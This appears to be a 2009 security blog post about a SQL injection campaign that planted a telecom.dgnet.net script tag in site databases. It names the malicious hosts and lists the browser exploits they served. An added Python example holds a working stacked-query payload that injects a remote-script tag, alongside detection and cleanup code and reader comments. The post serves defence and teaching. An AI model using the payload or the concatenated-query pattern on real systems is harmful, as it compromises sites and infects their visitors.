
Wednesday 25 February 2009

SQL injection attack: telecom.dgnet.net

This seems to be an emerging threat at the moment: a number of ASP / SQL / Windows sites have been hit with a SQL injection attack that plants a reference to the following JavaScript in their databases: telecom.dgnet.net/images/pen.gif. Yes, the name says GIF, but it isn't an image.

The site telecom.dgnet.net is at 121.14.137.36. The script there forwards visitors to another site at www.batnigt.com/ver.htm (and obviously, do NOT visit that site), which tries to run a number of exploits against visitors' PCs, including what appears to be an old ADODB.Stream exploit (perhaps MS04-024), the Snapshot Viewer exploit (MS08-041), some sort of exploit for RealPlayer and what MIGHT be an exploit for MS05-020 (but I need to look at this further). If a visitor's PC is up to date on Microsoft patches and does not have RealPlayer installed, it should probably be OK.

If you manage client PCs, then block or monitor for telecom.dgnet.net and batnigt.com. If your server has been hit by this attack then you need to clean the injected script out of the database (every text column of every table, not just the page you noticed it on) and then fix the underlying problem: somewhere the site is building SQL by concatenating user input into a query string. The real fix is parameterized queries rather than string concatenation (try Googling "SQL injection" and "parameterized queries"), and the account the web application uses to talk to the database should not have rights to update tables it only ever needs to read.
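To make the attack above and the cleanup advice concrete, here is an added example (not code from the original post) that shows both sides: a stacked-query injection through a concatenated query, the way the ASP sites described here were hit, and a schema walk that finds the planted tag in every text column and strips it again with a properly parameterised UPDATE. SQLite in memory stands in for the SQL Server backend; the exact form of the injected tag (the post only gives the src URL), the sample tables and the payload are constructed assumptions.

```python
"""Added example, not code from the original post: a stacked-query SQL
injection that plants a <script> tag in text columns, then a schema walk
that finds and strips the tag again. SQLite in memory stands in for the
SQL Server backend of the ASP sites in the post; the tag form, table
layout and payload are constructed assumptions."""
import re
import sqlite3

# Assumed form of the injected tag: the post gives only the src URL.
MARKER = "telecom.dgnet.net/images/pen.gif"
INJECTED_TAG = '<script src="http://%s"></script>' % MARKER
TAG_RE = re.compile(
    r'<script[^>]*telecom\.dgnet\.net/images/pen\.gif[^>]*>\s*</script>', re.I)

# Constructed payload. The mass injections of this period appended the tag to
# every text column via a cursor over the system catalog; SQLite has no
# cursors, so two plain UPDATEs stand in for that loop.
PAYLOAD = ("1; UPDATE products SET descr = descr || '%s'; "
           "UPDATE news SET body = body || '%s'" % (INJECTED_TAG, INJECTED_TAG))


def build_sample_db():
    """Constructed sample schema with clean content."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget', 9.99);
        INSERT INTO products VALUES (2, 'Gadget', 'A better gadget', 19.99);
        INSERT INTO news VALUES (1, 'Welcome', 'Hello world');
    """)
    return conn


def vulnerable_lookup(conn, product_id):
    """The classic ASP pattern: the request parameter is glued into the SQL
    text and the whole string goes to the server as one batch. sqlite3's
    execute() refuses multi-statement strings, so executescript() emulates
    ADO's batch execution here."""
    conn.executescript("SELECT name FROM products WHERE id=" + product_id)


def safe_lookup(conn, product_id):
    """Parameterised form: the value is bound, never parsed as SQL."""
    row = conn.execute("SELECT name FROM products WHERE id=?", (product_id,)).fetchone()
    return row[0] if row else None


def _quote_ident(name):
    # Identifiers cannot be bound as parameters; these come from the catalog,
    # not from users, and are quoted defensively anyway.
    return '"' + name.replace('"', '""') + '"'


def _text_columns(conn):
    """Yield (table, column) for every column with TEXT affinity."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for _cid, col, ctype, *_ in conn.execute(
                "PRAGMA table_info(%s)" % _quote_ident(table)):
            if any(k in ctype.upper() for k in ("CHAR", "TEXT", "CLOB")):
                yield table, col


def find_injected(conn, marker=MARKER):
    """Count rows per (table, column) that still contain the marker string."""
    hits = {}
    for table, col in _text_columns(conn):
        n = conn.execute("SELECT COUNT(*) FROM %s WHERE %s LIKE ?"
                         % (_quote_ident(table), _quote_ident(col)),
                         ("%" + marker + "%",)).fetchone()[0]
        if n:
            hits[(table, col)] = n
    return hits


def strip_injected(conn, marker=MARKER):
    """Remove the injected tag from every affected row; returns rows fixed.
    The UPDATE itself is parameterised: the cure must not repeat the cause."""
    fixed = 0
    for table, col in _text_columns(conn):
        t, c = _quote_ident(table), _quote_ident(col)
        rows = conn.execute("SELECT rowid, %s FROM %s WHERE %s LIKE ?" % (c, t, c),
                            ("%" + marker + "%",)).fetchall()
        for rowid, value in rows:
            conn.execute("UPDATE %s SET %s=? WHERE rowid=?" % (t, c),
                         (TAG_RE.sub("", value), rowid))
            fixed += 1
    conn.commit()
    return fixed
```

Run `vulnerable_lookup(conn, PAYLOAD)` against a fresh database and `find_injected` reports the tag in every text column the payload touched; `safe_lookup(conn, PAYLOAD)` simply returns no row and leaves the data alone. On a real SQL Server the same walk is done over sys.columns with a cursor, and the search string should also be checked against the web server's HTML files and templates, since a tag that turns up in every page but not in the database points at something other than the database being modified.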

2 comments:

Massimo said...
This comment has been removed by the author.
Massimo said...

My Win2003 web server was infected yesterday with that.

What is not so clear to me is the following: if it's just a matter of SQL injection, why was every simple HTML PAGE on my web server being sent to the Internet with the malicious code inside?

I supposed it was the IIS service being compromised, but probably it wasn't, since I ran some diagnostics.

Conclusion: I had to reformat my server.

Massimo